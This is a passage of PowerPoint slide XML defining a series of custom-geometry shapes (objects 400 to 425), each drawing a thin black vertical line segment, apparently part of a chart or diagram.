            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="129539">
                <a:moveTo>
                  <a:pt x="0" y="129235"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="129235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="129511"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="object 400"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6216479" y="5484078"/>
            <a:ext cx="0" cy="249153"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="125730">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="125279"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="object 401"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6216206" y="5484582"/>
            <a:ext cx="0" cy="247895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="125094">
                <a:moveTo>
                  <a:pt x="0" y="124754"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="125030"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="object 402"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6244385" y="5475486"/>
            <a:ext cx="0" cy="257961"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="130175">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129614"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="object 403"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6244111" y="5474908"/>
            <a:ext cx="2517" cy="257961"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="130175">
                <a:moveTo>
                  <a:pt x="1098" y="129636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1098" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="129636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="129912"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="object 404"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6271690" y="5455089"/>
            <a:ext cx="0" cy="278095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="140335">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="139913"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="object 405"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6270625" y="5453994"/>
            <a:ext cx="1258" cy="279353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="140969">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="140465"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="object 406"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299596" y="5461544"/>
            <a:ext cx="0" cy="271803"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="137160">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="136655"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="object 407"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299322" y="5462585"/>
            <a:ext cx="2517" cy="270545"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="136525">
                <a:moveTo>
                  <a:pt x="698" y="135854"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="135854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="136130"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="object 408"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6327503" y="5450819"/>
            <a:ext cx="0" cy="281870"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="142239">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="142067"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="object 409"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6325300" y="5451861"/>
            <a:ext cx="2517" cy="280612"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="141605">
                <a:moveTo>
                  <a:pt x="0" y="141266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="141266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="141542"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="object 410"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355355" y="5447592"/>
            <a:ext cx="0" cy="285645"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="144144">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="143696"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="object 411"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355083" y="5450315"/>
            <a:ext cx="1258" cy="283128"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="142875">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="142322"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="object 412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6383261" y="5435268"/>
            <a:ext cx="0" cy="298229"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="150494">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="149909"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="object 413"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6382987" y="5433306"/>
            <a:ext cx="2517" cy="299487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="151130">
                <a:moveTo>
                  <a:pt x="1244" y="150629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="150629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="150905"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="object 414"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411115" y="5422914"/>
            <a:ext cx="0" cy="309554"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="156210">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="156150"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="object 415"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6410048" y="5421819"/>
            <a:ext cx="1258" cy="310812"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="156844">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="156702"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="object 416"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438474" y="5404692"/>
            <a:ext cx="0" cy="328429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="165735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165345"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="object 417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438200" y="5407416"/>
            <a:ext cx="2517" cy="325912"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="164464">
                <a:moveTo>
                  <a:pt x="828" y="163694"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="828" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="163694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="163970"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="object 418"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6466379" y="5405237"/>
            <a:ext cx="0" cy="327171"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="165100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165069"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="object 419"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6464465" y="5407662"/>
            <a:ext cx="2517" cy="325912"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="164464">
                <a:moveTo>
                  <a:pt x="0" y="163570"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="163570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="163846"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="object 420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6494232" y="5387553"/>
            <a:ext cx="0" cy="344788"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="173989">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="173988"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="object 421"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493959" y="5388056"/>
            <a:ext cx="1258" cy="344788"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="173989">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="173739"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="object 422"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6522139" y="5363421"/>
            <a:ext cx="0" cy="369954"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="186689">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="186165"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="object 423"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6519142" y="5365309"/>
            <a:ext cx="3775" cy="367438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="185419">
                <a:moveTo>
                  <a:pt x="0" y="184942"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="185218"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="object 424"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6550045" y="5347333"/>
            <a:ext cx="0" cy="385055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="194310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="194283"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="object 425"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6549226" y="5346455"/>
            <a:ext cx="1258" cy="386313"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="194944">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="194732"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
